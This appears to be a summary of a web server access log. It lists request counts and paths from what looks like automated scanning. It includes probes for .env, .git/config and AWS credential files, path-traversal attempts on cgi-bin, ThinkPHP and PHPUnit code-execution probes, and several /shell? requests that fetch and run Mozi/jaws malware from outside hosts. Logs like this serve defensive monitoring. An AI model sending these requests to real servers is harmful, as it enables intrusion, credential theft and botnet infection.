3 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /application/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /asdf.php |
HTTP/1.1 |
1 | GET | /assets../.git/config |
HTTP/1.1 |
1 | GET | /auth/.env |
HTTP/1.1 |
1 | GET | /aws.yml |
HTTP/1.1 |
1 | GET | /back/.env |
HTTP/1.1 |
1 | GET | /backend/.env |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
1 | GET | /cgi-bin/.%2e/%2e%2e/.git/config |
HTTP/1.1 |
1 | GET | /cgi-bin/.%2e/.git/config |
HTTP/1.1 |
1 | GET | /cli/.env |
HTTP/1.1 |
1 | GET | /config.env |
HTTP/1.1 |
1 | GET | /config/.env |
HTTP/1.1 |
1 | GET | /config/aws.yml |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /content../.git/config |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /cp/.env |
HTTP/1.1 |
1 | GET | /css../.git/config |
HTTP/1.1 |
1 | GET | /dashboard/phpinfo.php |
HTTP/1.1 |
2 | GET | /debug/default/view?panel=config |
HTTP/1.1 |
1 | GET | /dependencies/.env |
HTTP/1.1 |
1 | GET | /deployment/.env |
HTTP/1.1 |
1 | GET | /dev/.env |
HTTP/1.1 |
1 | GET | /development/.env |
HTTP/1.1 |
1 | GET | /docker/.env |
HTTP/1.1 |
1 | GET | /document/.env |
HTTP/1.1 |
1 | GET | /engine/.env |
HTTP/1.1 |
1 | GET | /events../.git/config |
HTTP/1.1 |
1 | GET | /framework/.env |
HTTP/1.1 |
1 | GET | /frontend/.env |
HTTP/1.1 |
1 | GET | /frontend_dev.php/$ |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /i.php |
HTTP/1.1 |
1 | GET | /images../.git/config |
HTTP/1.1 |
1 | GET | /img../.git/config |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
3 | GET | /info.php |
HTTP/1.1 |
1 | GET | /infophp.php |
HTTP/1.1 |
1 | GET | /infos.php |
HTTP/1.1 |
1 | GET | /js../.git/config |
HTTP/1.1 |
1 | GET | /laravel-artisa/.env |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /lib../.git/config |
HTTP/1.1 |
1 | GET | /linusadmin-phpinfo.php |
HTTP/1.1 |
1 | GET | /local/.env |
HTTP/1.1 |
1 | GET | /login/.env |
HTTP/1.1 |
1 | GET | /master/.env |
HTTP/1.1 |
1 | GET | /media../.git/config |
HTTP/1.1 |
1 | GET | /old_phpinfo.php |
HTTP/1.1 |
1 | GET | /personal/.env |
HTTP/1.1 |
1 | GET | /php-info.php |
HTTP/1.1 |
1 | GET | /php.ini |
HTTP/1.1 |
1 | GET | /php.php |
HTTP/1.1 |
2 | GET | /phpinfo.php |
HTTP/1.1 |
1 | GET | /phpinfo |
HTTP/1.1 |
1 | GET | /phpversion.php |
HTTP/1.1 |
1 | GET | /pinfo.php |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /private/.env |
HTTP/1.1 |
1 | GET | /project/.env |
HTTP/1.1 |
1 | GET | /protected/.env |
HTTP/1.1 |
1 | GET | /rest/.env |
HTTP/1.1 |
1 | GET | /search/.env |
HTTP/1.1 |
1 | GET | /server/.env |
HTTP/1.1 |
1 | GET | /shared/.env |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]194[.]190[.]11:55210/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+v1[.]kannimanelaji[.]com/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /showLogin.cc |
HTTP/1.1 |
1 | GET | /site/.env |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
1 | GET | /static../.git/config |
HTTP/1.1 |
1 | GET | /system/.env |
HTTP/1.1 |
1 | GET | /temp.php |
HTTP/1.1 |
2 | GET | /test.php |
HTTP/1.1 |
1 | GET | /time.php |
HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /vod_installer/.env |
HTTP/1.1 |
1 | GET | /vue/.env |
HTTP/1.1 |
1 | GET | /web/.env |
HTTP/1.1 |
2 | HEAD | / |
HTTP/1.1 |
1 | HEAD | /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png |
HTTP/1.1 |
1 | HEAD | /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png |
HTTP/1.1 |
1 | HEAD | /icons/.%2e/%2e%2e/apache2/icons/sphere1.png |
HTTP/1.1 |
1 | HEAD | /icons/sphere1.png |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |